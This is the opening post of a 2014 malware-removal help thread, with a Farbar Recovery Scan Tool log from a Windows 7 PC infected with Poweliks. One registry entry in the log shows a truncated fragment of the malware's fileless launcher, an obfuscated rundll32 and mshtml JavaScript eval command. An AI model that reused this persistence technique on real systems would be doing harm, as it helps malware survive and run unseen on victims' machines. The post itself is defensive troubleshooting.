Infected with Poweliks


  • This topic is locked
15 replies to this topic

#1 ScotDesort

ScotDesort

  • Members
  • 7 posts

Posted 28 October 2014 - 10:46 AM

I have a client's PC running Windows 7. It is infected with Poweliks: dllhost processes that spawn and consume resources. I have already scanned with MBAM, COMBOFIX, TDDS and SOPHOS. All are clear, except... Combofix identifies and supposedly removes Poweliks but it returns.

Ran FRST. Here is the log. Thanks in advance for any help:

 

Scan result of Farbar Recovery Scan Tool (FRST) (x86) Version: 27-10-2014 01
Ran by KELI (administrator) on ATTY-2 on 28-10-2014 10:01:43
Running from C:\Users\KELI\Desktop
Loaded Profile: KELI (Available profiles: KELI)
Platform: Microsoft Windows 7 Professional  Service Pack 1 (X86) OS Language: English (United States)
Internet Explorer Version 11
Boot Mode: Normal
Tutorial for Farbar Recovery Scan Tool: http://www.geekstogo.com/forum/topic/335081-frst-tutorial-how-to-use-farbar-recovery-scan-tool/

==================== Processes (Whitelisted) =================

(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)

(McAfee, Inc.) C:\Program Files\McAfee\Managed VirusScan\VScan\EngineServer.exe
(InterVideo) C:\Program Files\Common Files\InterVideo\RegMgr\iviRegMgr.exe
(Intel Corporation) C:\Program Files\Intel\AMT\LMS.exe
(PDF Complete Inc) C:\Program Files\PDF Complete\pdfsvc.exe
(Protexis Inc.) C:\Program Files\Common Files\Protexis\License Service\PsiService_2.exe
(Microsoft Corporation) C:\Program Files\Microsoft\Search Enhancement Pack\SeaPort\SeaPort.exe
() C:\Program Files\SiteAdvisor\6173\SAService.exe
(Intel Corporation) C:\Program Files\Common Files\Intel\Privacy Icon\UNS\UNS.exe
(Microsoft Corporation) C:\Program Files\Common Files\microsoft shared\Windows Live\WLIDSVC.EXE
(Microsoft Corporation) C:\Program Files\Common Files\microsoft shared\Windows Live\WLIDSVCM.EXE
(Microsoft Corporation) C:\Windows\System32\PrintIsolationHost.exe
(Microsoft Corporation) C:\Windows\System32\rundll32.exe
(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RtHDVCpl.exe
(Intel Corporation) C:\Program Files\Common Files\Intel\Privacy Icon\PrivacyIconClient.exe
(McAfee, Inc.) C:\Program Files\McAfee\Managed VirusScan\Agent\StartMyAgtTry.exe
() C:\Program Files\SiteAdvisor\6173\SiteAdv.exe
(Intel Corporation) C:\Windows\System32\igfxtray.exe
(Intel Corporation) C:\Windows\System32\hkcmd.exe
(Intel Corporation) C:\Windows\System32\igfxpers.exe
(KYOCERA MITA Corporation) C:\Program Files\Kyocera\FileUtility\NsCatCom.exe
(Adobe Systems Incorporated) C:\Program Files\Adobe\Reader 10.0\Reader\reader_sl.exe
(Dropbox, Inc.) C:\Users\KELI\AppData\Roaming\Dropbox\bin\Dropbox.exe
(Google) C:\Program Files\Google\Common\Google Updater\GoogleUpdaterService.exe
(Microsoft Corporation) C:\Windows\Microsoft.NET\Framework\v3.0\WPF\PresentationFontCache.exe
(Microsoft Corporation) C:\Windows\System32\taskmgr.exe
(Microsoft Corporation) C:\Windows\System32\dllhost.exe
(Microsoft Corporation) C:\Windows\System32\dllhost.exe


==================== Registry (Whitelisted) ==================

(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)

HKLM\...\Run: [RtHDVCpl] => C:\Program Files\Realtek\Audio\HDA\RtHDVCpl.exe [7596576 2009-07-02] (Realtek Semiconductor)
HKLM\...\Run: [picon] => C:\Program Files\Common Files\Intel\Privacy Icon\PrivacyIconClient.exe [796696 2009-07-24] (Intel Corporation)
HKLM\...\Run: [PDF Complete] => C:\Program Files\PDF Complete\pdfsty.exe [563736 2009-06-18] (PDF Complete Inc)
HKLM\...\Run: [Microsoft Default Manager] => C:\Program Files\Microsoft\Search Enhancement Pack\Default Manager\DefMgr.exe [439568 2010-05-10] (Microsoft Corporation)
HKLM\...\Run: [MVS Splash] => C:\Program Files\McAfee\Managed VirusScan\Agent\Splash.exe [562496 2009-11-17] (McAfee, Inc.)
HKLM\...\Run: [McAfee Managed Services Tray] => C:\Program Files\McAfee\Managed VirusScan\Agent\StartMyAgtTry.Exe [95552 2009-11-17] (McAfee, Inc.)
HKLM\...\Run: [SiteAdvisor] => C:\Program Files\SiteAdvisor\6173\SiteAdv.exe [36640 2007-08-28] ()
HKLM\...\Run: [Adobe ARM] => C:\Program Files\Common Files\Adobe\ARM\1.0\AdobeARM.exe [959904 2013-11-21] (Adobe Systems Incorporated)
HKLM\...\RunOnce: [NCPluginUpdater] => C:\Program Files\Hewlett-Packard\HP Health Check\ActiveCheck\product_line\NCPluginUpdater.exe [21720 2014-10-21] (Hewlett-Packard)
HKU\S-1-5-21-3621039740-3434257137-3815352865-1001\...\Run: [swg] => C:\Program Files\Google\GoogleToolbarNotifier\GoogleToolbarNotifier.exe [39408 2011-03-21] (Google Inc.)
HKU\S-1-5-21-3621039740-3434257137-3815352865-1001\...A8F59079A8D5}\localserver32: rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";eval("epdvnfou/xsjuf)(=tdsjqu!mbohvbhf>ktds (the data entry has 239 more characters). <==== Poweliks!
Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\Scanner File Utility.lnk
ShortcutTarget: Scanner File Utility.lnk -> C:\Program Files\Kyocera\FileUtility\NsCatCom.exe (KYOCERA MITA Corporation)
Startup: C:\Users\KELI\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Dropbox.lnk
ShortcutTarget: Dropbox.lnk -> C:\Users\KELI\AppData\Roaming\Dropbox\bin\Dropbox.exe (Dropbox, Inc.)

==================== Internet (Whitelisted) ====================

(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)

HKCU\Software\Microsoft\Internet Explorer\Main,Start Page = http://g.msn.com/HPCOM/1
HKCU\Software\Microsoft\Internet Explorer\Main,Search Page = http://www.microsoft.com/isapi/redir.dll?prd=ie&ar=iesearch
SearchScopes: HKLM - {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL =
BHO: No Name -> {089FD14D-132B-48FC-8861-0048AE113215} -> C:\Program Files\SiteAdvisor\6173\SiteAdv.dll ()
BHO: Search Helper -> {6EBF7485-159F-4bff-A14F-B9E3AAC4465B} -> C:\Program Files\Microsoft\Search Enhancement Pack\Search Helper\SEPsearchhelperie.dll (Microsoft Corporation)
BHO: Windows Live ID Sign-in Helper -> {9030D464-4C02-4ABF-8ECC-5164760863C6} -> C:\Program Files\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll (Microsoft Corporation)
BHO: Google Toolbar Helper -> {AA58ED58-01DD-4d91-8333-CF10577473F7} -> C:\Program Files\Google\Google Toolbar\GoogleToolbar_32.dll (Google Inc.)
BHO: Bing Bar BHO -> {d2ce3e00-f94a-4740-988e-03dc2f38c34f} -> C:\Program Files\MSN Toolbar\Platform\6.0.2237.0\npwinext.dll (Microsoft Corporation)
BHO: HP Network Check Helper -> {E76FD755-C1BA-4DCB-9F13-99BD91223ADE} -> C:\Program Files\Hewlett-Packard\HP Support Framework\Resources\HPNetworkCheck\HPNetworkCheckPlugin.dll (Hewlett-Packard)
Toolbar: HKLM - @C:\Program Files\MSN Toolbar\Platform\6.0.2237.0\npwinext.dll,-100 - {8dcb7100-df86-4384-8842-8fa844297b3f} - C:\Program Files\MSN Toolbar\Platform\6.0.2237.0\npwinext.dll (Microsoft Corporation)
Toolbar: HKLM - McAfee SiteAdvisor - {0BF43445-2F28-4351-9252-17FE6E806AA0} - C:\Program Files\SiteAdvisor\6173\SiteAdv.dll ()
Toolbar: HKLM - Google Toolbar - {2318C2B1-4965-11d4-9B18-009027A5CD4F} - C:\Program Files\Google\Google Toolbar\GoogleToolbar_32.dll (Google Inc.)
Toolbar: HKCU - Google Toolbar - {2318C2B1-4965-11D4-9B18-009027A5CD4F} - C:\Program Files\Google\Google Toolbar\GoogleToolbar_32.dll (Google Inc.)
DPF: {E2883E8F-472F-4FB0-9522-AC9BF37916A7} http://platformdl.adobe.com/NOS/getPlusPlus/1.6/gp.cab
Handler: myrm - {4D034FC3-013F-4b95-B544-44D49ABE3E76} - C:\Program Files\McAfee\Managed VirusScan\Agent\myRmProt4.9.2.358.dll (McAfee, Inc.)
Handler: siteadvisor - {3A5DC592-7723-4EAA-9EE6-AF4222BCF879} - C:\Program Files\SiteAdvisor\6173\SiteAdv.dll ()
Tcpip\..\Interfaces\{47CED9F3-6727-4E66-BBD7-559438BB948D}: [NameServer] 167.206.245.130,167.206.245.129

FireFox:
========
FF Plugin: @Google.com/GoogleEarthPlugin -> C:\Program Files\Google\Google Earth\plugin\npgeplugin.dll (Google)
FF Plugin: @microsoft.com/GENUINE -> disabled No File
FF Plugin: @Microsoft.com/NpCtrl,version=1.0 -> c:\Program Files\Microsoft Silverlight\4.0.50401.0\npctrl.dll ( Microsoft Corporation)
FF Plugin: @Microsoft.com/NpWinExt,version=5.0 -> C:\Program Files\MSN Toolbar\Platform\6.0.2237.0\npwinext.dll (Microsoft Corporation)
FF Plugin: @tools.google.com/Google Update;version=3 -> C:\Program Files\Google\Update\1.3.25.5\npGoogleUpdate3.dll (Google Inc.)
FF Plugin: @tools.google.com/Google Update;version=9 -> C:\Program Files\Google\Update\1.3.25.5\npGoogleUpdate3.dll (Google Inc.)
FF Plugin: Adobe Reader -> C:\Program Files\Adobe\Reader 10.0\Reader\AIR\nppdf32.dll (Adobe Systems Inc.)
FF Plugin HKCU: @citrixonline.com/appdetectorplugin -> C:\Users\KELI\AppData\Local\Citrix\Plugins\104\npappdetector.dll (Citrix Online)
FF HKLM\...\Firefox\Extensions: [msntoolbar@msn.com] - C:\Program Files\MSN Toolbar\Platform\6.0.2237.0\Firefox
FF Extension: Bing Bar - C:\Program Files\MSN Toolbar\Platform\6.0.2237.0\Firefox [2010-10-16]
FF HKLM\...\Firefox\Extensions: [{27182e60-b5f3-411c-b545-b44205977502}] - C:\Program Files\Microsoft\Search Enhancement Pack\Search Helper\firefoxextension\SearchHelperExtension
FF Extension: Search Helper Extension - C:\Program Files\Microsoft\Search Enhancement Pack\Search Helper\firefoxextension\SearchHelperExtension [2010-10-16]
FF HKLM\...\Firefox\Extensions: [{3252b9ae-c69a-4eaf-9502-dc9c1f6c009e}] - C:\Program Files\Microsoft\Search Enhancement Pack\Default Manager\DMExtension
FF Extension: Default Manager - C:\Program Files\Microsoft\Search Enhancement Pack\Default Manager\DMExtension [2010-10-16]

Chrome:
=======
CHR HomePage: Default -> hxxp://www.google.com/
CHR StartupUrls: Default -> "hxxp://www.google.com/"
CHR Plugin: (Shockwave Flash) - C:\Program Files\Google\Chrome\Application\38.0.2125.104\PepperFlash\pepflashplayer.dll ()
CHR Plugin: (Chrome Remote Desktop Viewer) - internal-remoting-viewer
CHR Plugin: (Native Client) - C:\Program Files\Google\Chrome\Application\38.0.2125.104\ppGoogleNaClPluginChrome.dll No File
CHR Plugin: (Chrome PDF Viewer) - C:\Program Files\Google\Chrome\Application\38.0.2125.104\pdf.dll ()
CHR Plugin: (Adobe Acrobat) - C:\Program Files\Adobe\Reader 10.0\Reader\Browser\nppdf32.dll (Adobe Systems Inc.)
CHR Plugin: (Google Update) - C:\Program Files\Google\Update\1.3.21.123\npGoogleUpdate3.dll No File
CHR Plugin: (Bing Bar) - C:\Program Files\MSN Toolbar\Platform\6.0.2237.0\npwinext.dll (Microsoft Corporation)
CHR Plugin: (Silverlight Plug-In) - c:\Program Files\Microsoft Silverlight\4.0.50401.0\npctrl.dll ( Microsoft Corporation)
CHR Profile: C:\Users\KELI\AppData\Local\Google\Chrome\User Data\Default
CHR Extension: (Google Voice Search Hotword (Beta)) - C:\Users\KELI\AppData\Local\Google\Chrome\User Data\Default\Extensions\bepbmhgboaologfdajaanbcjmnhjmhfn [2014-07-18]
CHR Extension: (Google Wallet) - C:\Users\KELI\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2014-04-01]

========================== Services (Whitelisted) =================

(If an entry is included in the fixlist, the service will be removed from the registry. The file will not be moved unless listed separately.)

R2 EngineServer; C:\Program Files\McAfee\Managed VirusScan\VScan\EngineServer.exe [14144 2009-06-02] (McAfee, Inc.)
S2 HP Support Assistant Service; C:\Program Files\Hewlett-Packard\HP Support Framework\hpsa_service.exe [92160 2013-11-04] (Hewlett-Packard Company) [File not signed]
S4 McShield; C:\Program Files\McAfee\Managed VirusScan\VScan\McShield.exe [144704 2009-06-02] (McAfee, Inc.)
S4 myAgtSvc; C:\Program Files\McAfee\Managed VirusScan\Agent\myAgtSvc.Exe [221024 2009-11-17] (McAfee, Inc.)
R2 pdfcDispatcher; C:\Program Files\PDF Complete\pdfsvc.exe [635416 2009-06-18] (PDF Complete Inc)
R2 SiteAdvisor Service; C:\Program Files\SiteAdvisor\6173\SAService.exe [341280 2010-10-16] ()
R2 UNS; C:\Program Files\Common Files\Intel\Privacy Icon\UNS\UNS.exe [2066968 2009-07-24] (Intel Corporation)

==================== Drivers (Whitelisted) ====================

(If an entry is included in the fixlist, the service will be removed from the registry. The file will not be moved unless listed separately.)

S3 MBAMSwissArmy; C:\Windows\system32\drivers\MBAMSwissArmy.sys [114904 2014-10-27] (Malwarebytes Corporation)
S3 MfeAVFK; C:\Windows\System32\drivers\MfeAVFK.sys [79816 2009-05-15] (McAfee, Inc.)
S3 MfeBOPK; C:\Windows\System32\drivers\MfeBOPK.sys [35272 2009-05-15] (McAfee, Inc.)
R1 mfehidk; C:\Windows\System32\drivers\mfehidk.sys [214024 2009-05-15] (McAfee, Inc.)
S3 MfeRKDK; C:\Windows\System32\drivers\MfeRKDK.sys [34248 2009-05-15] (McAfee, Inc.)
R1 mfetdik; C:\Windows\System32\drivers\mfetdik.sys [55336 2009-05-15] (McAfee, Inc.)
R3 vpcbus; C:\Windows\System32\DRIVERS\vpchbus.sys [172416 2010-11-20] (Microsoft Corporation)
R1 vpcnfltr; C:\Windows\System32\DRIVERS\vpcnfltr.sys [48128 2010-11-20] (Microsoft Corporation)
R3 vpcusb; C:\Windows\System32\DRIVERS\vpcusb.sys [78336 2010-11-20] (Microsoft Corporation)
R1 vpcvmm; C:\Windows\System32\drivers\vpcvmm.sys [296064 2010-11-20] (Microsoft Corporation)
S3 catchme; \??\C:\Users\KELI\AppData\Local\Temp\catchme.sys [X]

==================== NetSvcs (Whitelisted) ===================


(If an item is included in the fixlist, it will be removed from the registry. Any associated file could be listed separately to be moved.)


==================== One Month Created Files and Folders ========

(If an entry is included in the fixlist, the file\folder will be moved.)

2014-10-28 09:58 - 2014-10-28 09:58 - 00047174 _____ () C:\ComboFix.txt
2014-10-28 09:48 - 2014-10-28 09:58 - 00000000 ____D () C:\Qoobox
2014-10-28 09:48 - 2011-06-26 02:45 - 00256000 _____ () C:\Windows\PEV.exe
2014-10-28 09:48 - 2010-11-07 13:20 - 00208896 _____ () C:\Windows\MBR.exe
2014-10-28 09:48 - 2009-04-20 00:56 - 00060416 _____ (NirSoft) C:\Windows\NIRCMD.exe
2014-10-28 09:48 - 2000-08-30 20:00 - 00518144 _____ (SteelWerX) C:\Windows\SWREG.exe
2014-10-28 09:48 - 2000-08-30 20:00 - 00406528 _____ (SteelWerX) C:\Windows\SWSC.exe
2014-10-28 09:48 - 2000-08-30 20:00 - 00098816 _____ () C:\Windows\sed.exe
2014-10-28 09:48 - 2000-08-30 20:00 - 00080412 _____ () C:\Windows\grep.exe
2014-10-28 09:48 - 2000-08-30 20:00 - 00068096 _____ () C:\Windows\zip.exe
2014-10-28 09:46 - 2014-10-28 09:48 - 01998336 _____ () C:\Users\KELI\Downloads\AdwCleaner.exe
2014-10-28 09:45 - 2014-10-28 09:44 - 05591695 ____R (Swearware) C:\Users\KELI\Desktop\ComboFix.exe
2014-10-28 09:43 - 2014-10-28 09:44 - 05591695 _____ (Swearware) C:\Users\KELI\Downloads\ComboFix.exe
2014-10-28 09:24 - 2014-10-28 09:24 - 04181856 _____ (Kaspersky Lab ZAO) C:\Users\KELI\Downloads\tdsskiller (1).exe
2014-10-28 09:23 - 2014-10-28 09:24 - 04181856 _____ (Kaspersky Lab ZAO) C:\Users\KELI\Downloads\tdsskiller.exe
2014-10-27 17:24 - 2014-10-27 17:24 - 00003189 _____ () C:\Users\KELI\Desktop\Sophos Virus Removal Tool.lnk
2014-10-27 17:24 - 2014-10-27 17:24 - 00000000 ____D () C:\Users\KELI\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Sophos
2014-10-27 17:24 - 2014-10-27 17:24 - 00000000 ____D () C:\ProgramData\Sophos
2014-10-27 17:24 - 2014-10-27 17:24 - 00000000 ____D () C:\Program Files\Sophos
2014-10-27 17:18 - 2014-10-27 17:19 - 00000000 ____D () C:\NPE
2014-10-27 16:54 - 2014-10-27 17:21 - 00000000 ____D () C:\Users\KELI\AppData\Local\NPE
2014-10-27 16:54 - 2014-10-27 16:54 - 00000000 ____D () C:\ProgramData\Norton
2014-10-27 16:53 - 2014-10-27 16:56 - 103020744 _____ (Sophos Limited) C:\Users\KELI\Downloads\Sophos Virus Removal Tool.exe
2014-10-27 16:52 - 2014-10-27 16:53 - 03060320 ____N (Symantec Corporation) C:\Users\KELI\Downloads\NPE.exe
2014-10-27 16:16 - 2014-10-28 09:45 - 00000000 ____D () C:\Windows\erdnt
2014-10-27 16:12 - 2014-10-27 16:13 - 00025282 _____ () C:\Users\KELI\Desktop\Addition.txt
2014-10-27 16:11 - 2014-10-28 10:02 - 00013066 _____ () C:\Users\KELI\Desktop\FRST.txt
2014-10-27 16:11 - 2014-10-28 10:01 - 00000000 ____D () C:\FRST
2014-10-27 16:10 - 2014-10-27 16:10 - 01706144 _____ (Thisisu) C:\Users\KELI\Downloads\JRT.exe
2014-10-27 16:10 - 2014-10-27 16:10 - 01706144 _____ (Thisisu) C:\Users\KELI\Downloads\JRT (1).exe
2014-10-27 16:07 - 2014-10-27 16:07 - 01104896 _____ (Farbar) C:\Users\KELI\Downloads\FRST.exe
2014-10-27 16:07 - 2014-10-27 16:07 - 01104896 _____ (Farbar) C:\Users\KELI\Desktop\FRST.exe
2014-10-27 15:28 - 2014-10-27 16:41 - 00114904 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\MBAMSwissArmy.sys
2014-10-27 15:28 - 2014-10-27 15:29 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Malwarebytes Anti-Malware
2014-10-27 15:28 - 2014-10-27 15:29 - 00000000 ____D () C:\Program Files\Malwarebytes Anti-Malware
2014-10-27 15:28 - 2014-10-27 15:28 - 00000000 ____D () C:\ProgramData\Malwarebytes
2014-10-27 15:28 - 2014-10-01 11:11 - 00075480 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\mbamchameleon.sys
2014-10-27 15:28 - 2014-10-01 11:11 - 00051928 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\mwac.sys
2014-10-27 15:28 - 2014-10-01 11:11 - 00023256 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\mbam.sys
2014-10-22 12:44 - 2014-10-22 17:04 - 00000000 ___HD () C:\ProgramData\{D9E629DC-CB1C-4A97-9900-81922B4EFFD4}
2014-10-22 12:44 - 2014-10-22 12:44 - 00000000 ____D () C:\ProgramData\Windows Genuine Advantage
2014-10-15 13:57 - 2014-10-09 21:44 - 00396288 _____ (Microsoft Corporation) C:\Windows\system32\aepdu.dll
2014-10-15 13:57 - 2014-10-09 21:44 - 00230912 _____ (Microsoft Corporation) C:\Windows\system32\generaltel.dll
2014-10-15 13:57 - 2014-10-09 21:39 - 00302592 _____ (Microsoft Corporation) C:\Windows\system32\aeinv.dll
2014-10-15 13:57 - 2014-10-06 22:04 - 00331448 _____ (Microsoft Corporation) C:\Windows\system32\iedkcs32.dll
2014-10-15 13:57 - 2014-09-28 20:41 - 02379264 _____ (Microsoft Corporation) C:\Windows\system32\win32k.sys
2014-10-15 13:57 - 2014-09-25 18:46 - 00365056 _____ (Microsoft Corporation) C:\Windows\system32\dxtmsft.dll
2014-10-15 13:57 - 2014-09-25 18:46 - 00243200 _____ (Microsoft Corporation) C:\Windows\system32\dxtrans.dll
2014-10-15 13:57 - 2014-09-25 18:46 - 00069632 _____ (Microsoft Corporation) C:\Windows\system32\mshtmled.dll
2014-10-15 13:57 - 2014-09-25 18:43 - 11807232 _____ (Microsoft Corporation) C:\Windows\system32\ieframe.dll
2014-10-15 13:57 - 2014-09-25 18:32 - 02017280 _____ (Microsoft Corporation) C:\Windows\system32\inetcpl.cpl
2014-10-15 13:57 - 2014-09-18 21:44 - 17484800 _____ (Microsoft Corporation) C:\Windows\system32\mshtml.dll
2014-10-15 13:57 - 2014-09-18 21:25 - 04201472 _____ (Microsoft Corporation) C:\Windows\system32\jscript9.dll
2014-10-15 13:57 - 2014-09-18 21:14 - 02724864 _____ (Microsoft Corporation) C:\Windows\system32\mshtml.tlb
2014-10-15 13:57 - 2014-09-18 21:14 - 00004096 _____ (Microsoft Corporation) C:\Windows\system32\ieetwcollectorres.dll
2014-10-15 13:57 - 2014-09-18 21:02 - 00454656 _____ (Microsoft Corporation) C:\Windows\system32\vbscript.dll
2014-10-15 13:57 - 2014-09-18 21:01 - 00061952 _____ (Microsoft Corporation) C:\Windows\system32\iesetup.dll
2014-10-15 13:57 - 2014-09-18 21:01 - 00051200 _____ (Microsoft Corporation) C:\Windows\system32\ieetwproxystub.dll
2014-10-15 13:57 - 2014-09-18 20:59 - 00061952 _____ (Microsoft Corporation) C:\Windows\system32\MshtmlDac.dll
2014-10-15 13:57 - 2014-09-18 20:55 - 02187264 _____ (Microsoft Corporation) C:\Windows\system32\iertutil.dll
2014-10-15 13:57 - 2014-09-18 20:54 - 00043008 _____ (Microsoft Corporation) C:\Windows\system32\jsproxy.dll
2014-10-15 13:57 - 2014-09-18 20:53 - 00032768 _____ (Microsoft Corporation) C:\Windows\system32\iernonce.dll
2014-10-15 13:57 - 2014-09-18 20:51 - 00440320 _____ (Microsoft Corporation) C:\Windows\system32\ieui.dll
2014-10-15 13:57 - 2014-09-18 20:50 - 00112128 _____ (Microsoft Corporation) C:\Windows\system32\ieUnatt.exe
2014-10-15 13:57 - 2014-09-18 20:50 - 00108032 _____ (Microsoft Corporation) C:\Windows\system32\ieetwcollector.exe
2014-10-15 13:57 - 2014-09-18 20:49 - 00597504 _____ (Microsoft Corporation) C:\Windows\system32\jscript9diag.dll
2014-10-15 13:57 - 2014-09-18 20:44 - 00646144 _____ (Microsoft Corporation) C:\Windows\system32\MsSpellCheckingFacility.exe
2014-10-15 13:57 - 2014-09-18 20:36 - 00060416 _____ (Microsoft Corporation) C:\Windows\system32\JavaScriptCollectionAgent.dll
2014-10-15 13:57 - 2014-09-18 20:32 - 00164864 _____ (Microsoft Corporation) C:\Windows\system32\msrating.dll
2014-10-15 13:57 - 2014-09-18 20:20 - 00677888 _____ (Microsoft Corporation) C:\Windows\system32\ie4uinit.exe
2014-10-15 13:57 - 2014-09-18 20:20 - 00607744 _____ (Microsoft Corporation) C:\Windows\system32\msfeeds.dll
2014-10-15 13:57 - 2014-09-18 20:18 - 01068032 _____ (Microsoft Corporation) C:\Windows\system32\mshtmlmedia.dll
2014-10-15 13:57 - 2014-09-18 19:59 - 01810944 _____ (Microsoft Corporation) C:\Windows\system32\wininet.dll
2014-10-15 13:57 - 2014-09-18 19:53 - 01190400 _____ (Microsoft Corporation) C:\Windows\system32\urlmon.dll
2014-10-15 13:57 - 2014-09-18 19:52 - 00678400 _____ (Microsoft Corporation) C:\Windows\system32\ieapfltr.dll
2014-10-15 13:57 - 2014-09-04 01:04 - 00372736 _____ (Microsoft Corporation) C:\Windows\system32\rastls.dll
2014-10-15 13:57 - 2014-06-18 18:23 - 01131664 _____ (Microsoft Corporation) C:\Windows\system32\dfshim.dll
2014-10-15 13:57 - 2014-06-18 18:23 - 00156824 _____ (Microsoft Corporation) C:\Windows\system32\mscorier.dll
2014-10-15 13:57 - 2014-06-18 18:23 - 00081560 _____ (Microsoft Corporation) C:\Windows\system32\mscories.dll
2014-10-15 13:56 - 2014-09-17 21:32 - 02363904 _____ (Microsoft Corporation) C:\Windows\system32\msi.dll
2014-10-15 13:56 - 2014-09-12 21:40 - 00067072 _____ (Microsoft Corporation) C:\Windows\system32\packager.dll
2014-10-15 13:56 - 2014-08-18 22:41 - 00050688 _____ (Microsoft Corporation) C:\Windows\system32\appidapi.dll
2014-10-15 13:56 - 2014-08-18 22:41 - 00050176 _____ (Microsoft Corporation) C:\Windows\system32\setbcdlocale.dll
2014-10-15 13:56 - 2014-08-18 22:41 - 00027648 _____ (Microsoft Corporation) C:\Windows\system32\appidsvc.dll
2014-10-15 13:56 - 2014-08-18 22:40 - 00096768 _____ (Microsoft Corporation) C:\Windows\system32\appidpolicyconverter.exe
2014-10-15 13:56 - 2014-08-18 22:40 - 00016896 _____ (Microsoft Corporation) C:\Windows\system32\appidcertstorecheck.exe
2014-10-15 13:56 - 2014-08-18 21:48 - 00050176 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\appid.sys
2014-10-15 13:56 - 2014-07-16 21:40 - 00157696 _____ (Microsoft Corporation) C:\Windows\system32\winsta.dll
2014-10-15 13:56 - 2014-07-16 21:39 - 03221504 _____ (Microsoft Corporation) C:\Windows\system32\mstscax.dll
2014-10-15 13:56 - 2014-07-16 21:39 - 01051136 _____ (Microsoft Corporation) C:\Windows\system32\mstsc.exe
2014-10-15 13:56 - 2014-07-16 21:39 - 00523264 _____ (Microsoft Corporation) C:\Windows\system32\termsrv.dll
2014-10-15 13:56 - 2014-07-16 21:39 - 00304128 _____ (Microsoft Corporation) C:\Windows\system32\winlogon.exe
2014-10-15 13:56 - 2014-07-16 21:39 - 00131584 _____ (Microsoft Corporation) C:\Windows\system32\aaclient.dll
2014-10-15 13:56 - 2014-07-16 21:39 - 00130048 _____ (Microsoft Corporation) C:\Windows\system32\rdpcorekmts.dll
2014-10-15 13:56 - 2014-07-16 21:39 - 00065536 _____ (Microsoft Corporation) C:\Windows\system32\TSpkg.dll
2014-10-15 13:56 - 2014-07-16 21:39 - 00017408 _____ (Microsoft Corporation) C:\Windows\system32\credssp.dll
2014-10-15 13:56 - 2014-07-16 21:03 - 00184320 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\rdpwd.sys
2014-10-15 13:56 - 2014-07-16 21:02 - 00031232 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\tssecsrv.sys
2014-10-15 13:56 - 2014-07-06 21:40 - 11411456 _____ (Microsoft Corporation) C:\Windows\system32\wmp.dll
2014-10-15 13:56 - 2014-07-06 21:40 - 03208704 _____ (Microsoft Corporation) C:\Windows\system32\mf.dll
2014-10-15 13:56 - 2014-07-06 21:40 - 01329664 _____ (Microsoft Corporation) C:\Windows\system32\quartz.dll
2014-10-15 13:56 - 2014-07-06 21:40 - 01174528 _____ (Microsoft Corporation) C:\Windows\system32\crypt32.dll
2014-10-15 13:56 - 2014-07-06 21:40 - 01005056 _____ (Microsoft Corporation) C:\Windows\system32\cryptui.dll
2014-10-15 13:56 - 2014-07-06 21:40 - 00988160 _____ (Microsoft Corporation) C:\Windows\system32\drmv2clt.dll
2014-10-15 13:56 - 2014-07-06 21:40 - 00744960 _____ (Microsoft Corporation) C:\Windows\system32\blackbox.dll
2014-10-15 13:56 - 2014-07-06 21:40 - 00617984 _____ (Microsoft Corporation) C:\Windows\system32\wmdrmsdk.dll
2014-10-15 13:56 - 2014-07-06 21:40 - 00504320 _____ (Microsoft Corporation) C:\Windows\system32\msscp.dll
2014-10-15 13:56 - 2014-07-06 21:40 - 00489984 _____ (Microsoft Corporation) C:\Windows\system32\evr.dll
2014-10-15 13:56 - 2014-07-06 21:40 - 00473600 _____ (Microsoft Corporation) C:\Windows\system32\audiosrv.dll
2014-10-15 13:56 - 2014-07-06 21:40 - 00442880 _____ (Microsoft Corporation) C:\Windows\system32\AUDIOKSE.dll
2014-10-15 13:56 - 2014-07-06 21:40 - 00406016 _____ (Microsoft Corporation) C:\Windows\system32\drmmgrtn.dll
2014-10-15 13:56 - 2014-07-06 21:40 - 00374784 _____ (Microsoft Corporation) C:\Windows\system32\AudioEng.dll
2014-10-15 13:56 - 2014-07-06 21:40 - 00354816 _____ (Microsoft Corporation) C:\Windows\system32\mfplat.dll
2014-10-15 13:56 - 2014-07-06 21:40 - 00275968 _____ (Microsoft Corporation) C:\Windows\system32\EncDump.dll
2014-10-15 13:56 - 2014-07-06 21:40 - 00265216 _____ (Microsoft Corporation) C:\Windows\system32\msnetobj.dll
2014-10-15 13:56 - 2014-07-06 21:40 - 00195584 _____ (Microsoft Corporation) C:\Windows\system32\AudioSes.dll
2014-10-15 13:56 - 2014-07-06 21:40 - 00179200 _____ (Microsoft Corporation) C:\Windows\system32\wintrust.dll
2014-10-15 13:56 - 2014-07-06 21:40 - 00157184 _____ (Microsoft Corporation) C:\Windows\system32\pcasvc.dll
2014-10-15 13:56 - 2014-07-06 21:40 - 00143872 _____ (Microsoft Corporation) C:\Windows\system32\cryptsvc.dll
2014-10-15 13:56 - 2014-07-06 21:40 - 00103424 _____ (Microsoft Corporation) C:\Windows\system32\mfps.dll
2014-10-15 13:56 - 2014-07-06 21:40 - 00081408 _____ (Microsoft Corporation) C:\Windows\system32\cryptsp.dll
2014-10-15 13:56 - 2014-07-06 21:40 - 00008192 _____ (Microsoft Corporation) C:\Windows\system32\spwmp.dll
2014-10-15 13:56 - 2014-07-06 21:40 - 00004096 _____ (Microsoft Corporation) C:\Windows\system32\msdxm.ocx
2014-10-15 13:56 - 2014-07-06 21:40 - 00004096 _____ (Microsoft Corporation) C:\Windows\system32\dxmasf.dll
